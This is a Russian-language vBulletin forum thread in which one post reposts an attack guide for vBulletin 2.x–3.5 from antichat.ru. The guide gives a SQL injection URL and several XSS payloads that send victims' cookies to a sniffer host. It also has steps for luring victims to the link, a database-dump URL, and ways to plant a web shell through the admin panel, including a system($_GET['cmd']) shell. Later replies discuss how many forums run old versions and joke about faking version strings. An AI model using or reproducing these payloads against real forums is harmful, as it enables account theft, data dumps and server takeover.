Владельцам 3.8.6: не поставили патч - потеряли форум!

Файловый Архив

  • Неограниченное количество категорий и суб-категорий
  • Настройки прав доступа по группам
  • Настройки прав доступа по каждой категории
  • Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
  • Мультизагрузка файлов - SWFUploader
  • Добавление файлов с сервера
Подробности и история обновлений продукта в этой теме
Loading

Go Back   форум vBSupport.org > >
Register Изображения Меню vBsupport Files Manager Аллея Звёзд Реклама на форуме Search Today's Posts Mark Forums Read
  • Мемберка
  • Администраторам
  • Premoderation
  • For English speaking users
  • Изменения в правах
  • Каталог Фрилансеров
Пароли на скачивание файлов в Member Area меняются автоматически каждый день
Если вам нужно скачать какой то скрипт, за паролем ко мне в ЛС
привет какирам kerk
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Не можете скачать вложение?
Изменения в правах групп пользователей
внимательно читаем эту и эту темы
Короткая версия - тут
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

 
 
Первый пост
Old  
mA_sat
Продвинутый
Default 0

А у этих господ http://vbportal.org , что стояло?

Потому как:
http://www.zone-h.org/index2.php?opt...=45&id=4421867
 
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
Old  
VipeR
Private Person
Developer
 
VipeR's Avatar
Default 0

Quote:
Originally Posted by mA_sat
http://www.zone-h.org/index2.php?opt...5&id=44218 67
Ха-ха Прикольный дефейс Свеженький
А аккаунт vbportal.org кстати, в данное время еще в добавок ко всему заблокирован
 
Old  
rijy
На доске почёта
догадайся с трех раз
 
banned nax
Exclamation Обзор основных уязвимостей vBulletin 2

Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*.


Узнаём версию форума.
В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.

Code:
vbulletin_ajax_threadslist.js
vbulletin_ajax_namesugg.js
vbulletin_attachment.js
vbulletin_cpcolorpicker.js
vbulletin_editor.js
Пример:
www.xz.сom/forumpath/clientscript/vbulletin_editor.css



vBulletin:

2.2.* - 2.2.4 - Выполнение произвольного кода
Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.

Exploit: http://www.securitylab.ru/vulnerabil...rce/207147.php


2.3.* - SQL injection
Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.
Пример:
Code:
www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:

3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:
Code:
<body onLoad=img = new Image(); img.src = "http:// путь к снифаку"+document.cookie;>
3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Code:
TITLE:--------->Test<script>img = new Image(); img.src = "<A href="http://путь_к_снифаку"+document.cookie;</script">http://путь_к_снифаку"+document.cookie;</script>
        BODY:---------->No matter
        OTHER OPTIONS:->No matter
Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "<A href="http://путь_к_снифаку"+document.cookie;</script">http://путь_к_снифаку"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.


3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:
Code:
www.xz.сom/forumpath/profile.php?do=editpassword
        pass:your pass
        email: vashe@milo.com”><script>img = new Image(); img.src = "<A href="http://путь_к_снифаку"+document.cookie;</script>.nomatt">http://путь_к_снифаку"+document.cookie;</script>.nomatt
        Note About lenght limitation 
        ****
        forum/profile.php?do=editoptions
        Receive Email from Other Members=yes
        ****
        www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}
Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "<A href="http://путь_к_снифаку"+document.cookie;</script>.nomatt">http://путь_к_снифаку"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.


3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:
www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:


Уязвимости в модулях vBulletin.

vBug Tracker 3.5.1 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Code:
www.xz.сom/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Eimg = new Image(); img.src = "<A href="http://путь_к_снифаку"+document.cookie;%3c/script%3E">http://путь_к_снифаку"+document.cookie;%3C/script%3E

ImpEx 1.74 - PHP-инклюдинг и выполнение команд
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
Exploit: http://www.securitylab.ru/vulnerabil...rce/264410.php


Шелл в vBulletin.
Разберёмся как залить шелл из админки воблы.

Способ заливки шелла в vBulletin 2.*.* и 3.0.*
1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
Примечание: сработает не везде.


Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда



При использовании XSS c указанным в теме снифером надо завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru.

by antichat.ru
 
Old  
fuldon
Гуру
 
fuldon's Avatar
Default 0

Никаких серьезных уязвимостей не нашел.
Это должно сильно повезти, чтобы у взламываемого сайта была версия какая-нибудь 3.5.3 или что-то еще более древнее и без заплаток.

Так что интересно конечно, но без практической пользы.
 
Old  
rijy
На доске почёта
догадайся с трех раз
 
banned nax
Default 0

Quote:
Originally Posted by fuldon
Никаких серьезных уязвимостей не нашел.
Это должно сильно повезти, чтобы у взламываемого сайта была версия какая-нибудь 3.5.3 или что-то еще более древнее и без заплаток.
1. Google.Com-->поиск: vBulletin v(номер версии), Copyright ©2000-2006, Jelsoft Enterprises
смотрим какое ОГРОМНОЕ количество форумов имеют старые версии...

2. инсталл.пхп удаляют все, а вот ВСЮ папку инсталл, не так много народа как кажется..
 
Old  
fuldon
Гуру
 
fuldon's Avatar
Default 0

rijy, это непрофессиональный и в основном мелкие форумы, взломав которые ничего не случится.
 
Old  
SAS1024
io.sys
 
SAS1024's Avatar
Default 0

гм, я могу версию в футере написать любую, хоть 7.2.5, не факт что там не стоит патчиков и прочего.
 
Old  
rijy
На доске почёта
догадайся с трех раз
 
banned nax
Default 0

Quote:
это непрофессиональный и в основном мелкие форумы, взломав которые ничего не случится.
не случится для тебя)) а вот для админа взломаного форума - это серьезная неприятность(

Quote:
я могу версию в футере написать любую, хоть 7.2.5, не факт что там не стоит патчиков и прочего
можешь конечно, но покажи мне людей РЕАЛЬНО это делающих))

п.с. кто-нибудь чтонить может сказать конкретно насчет уязвимостей? методы защиты?
 
Old  
Winner
Мартовский Кот
 
Winner's Avatar
Default 0

Quote:
Originally Posted by SAS1024
гм, я могу версию в футере написать любую, хоть 7.2.5...
Лол! Надо будет так приколоться! Народ сразу бросится искать новую версию!
 
Old  
КотЪ
Администратор
Неадекватный
 
КотЪ's Avatar
Default 0

Quote:
п.с. кто-нибудь чтонить может сказать конкретно насчет уязвимостей? методы защиты?
А конкретно поменять версию тебе западло?
 
 

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 12:42 AM.


Powered by vBulletin® Version 3.6.10
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd.